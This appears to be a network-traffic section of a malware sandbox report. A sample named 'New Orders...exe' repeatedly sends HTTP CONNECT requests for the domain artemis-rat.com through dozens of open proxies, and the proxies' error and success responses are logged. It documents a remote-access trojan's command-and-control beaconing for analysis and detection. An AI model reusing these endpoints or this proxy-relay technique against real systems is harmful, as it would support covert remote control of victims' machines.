                                                                                        1213192.168.2.953429115.127.31.6680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.538934946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1214192.168.2.953492203.153.125.14654247672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.541884899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1215192.168.2.95289645.171.108.2539997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.543824911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616605997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.647085905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.718607903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.577572107 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:17:00.579384089 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1216192.168.2.953456103.49.202.252807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.544063091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1217192.168.2.951103167.250.181.1339997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.544534922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.926119089 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1218192.168.2.953517147.75.92.251100897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.546346903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.829675913 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1219192.168.2.951123212.110.188.189344057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.548304081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616683006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.647083044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.274775028 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1220192.168.2.9535115.75.192.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.548521996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.856544971 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1221192.168.2.952774103.162.16.4580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.549638987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616605997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.753395081 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1222192.168.2.953602104.17.37.235807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.555898905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.711299896 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1223192.168.2.953552107.173.255.18312347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.556116104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1224192.168.2.953599156.154.112.21807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.561464071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.725225925 CET1286INHTTP/1.1 405 Method Not Allowed
                                                                                        Server: squid/3.5.25
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 1557
                                                                                        X-Squid-Error: ERR_UNSUP_REQ 0
                                                                                        X-Cache: MISS from .
                                                                                        X-Cache-Lookup: NONE from .:80
                                                                                        Via: 1.1 . (squid/3.5.25)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 55 4e 53 55 50 5f 52 45 51 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 65 72 72 6f 72 3a 6d 65 74 68 6f 64 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 22 3e 65 72 72 6f 72 3a 6d 65 74 68 6f 64 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 55 6e 73 75 70 70 6f 72 74 65 64 20 52 65 71 75 65 73 74 20 4d 65 74 68 6f 64 20 61 6e 64 20 50 72 6f 74 6f 63 6f 6c 3c 2f 62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0a 0a 3c 70 3e 53 71 75 69 64 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 61 6c 6c 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 73 20 66 6f 72 20 61 6c 6c 20 61 63 63 65 73 73 20 70 72 6f 74 6f 63 6f 6c 73 2e 20 46 6f 72 20 65 78 61
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_UNSUP_REQ><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="error:method-not-allowed">error:method-not-allowed</a></p><blockquote id="error"><p><b>Unsupported Request Method and Protocol</b></p></blockquote><p>Squid does not support all request methods for all access protocols. For exa
                                                                                        Mar 11, 2024 16:16:44.725235939 CET577INData Raw: 6d 70 6c 65 2c 20 79 6f 75 20 63 61 6e 20 6e 6f 74 20 50 4f 53 54 20 61 20 47 6f 70 68 65 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 70 3e 59 6f 75 72 20 63 61 63 68 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 73 20 3c 61 20 68 72
                                                                                        Data Ascii: mple, you can not POST a Gopher request.</p><p>Your cache administrator is <a href="mailto:support@dnsadvantage.com?subject=CacheErrorInfo%20-%20ERR_UNSUP_REQ&amp;body=CacheHost%3A%20.%0D%0AErrPage%3A%20ERR_UNSUP_REQ%0D%0AErr%3A%20%5Bnone%5D


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1225192.168.2.953438175.183.82.22181937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.571469069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1226192.168.2.95293478.30.128.1080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.584721088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1227192.168.2.953661185.162.229.112807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.608195066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.764023066 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1228192.168.2.9536621.0.0.4807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.618810892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.774835110 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1229192.168.2.952903154.239.9.8280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.618963003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742003918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.835927963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.835851908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.888880014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.945036888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.960700989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:56.976277113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:44.976319075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1230192.168.2.953677104.17.215.222807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.628015041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
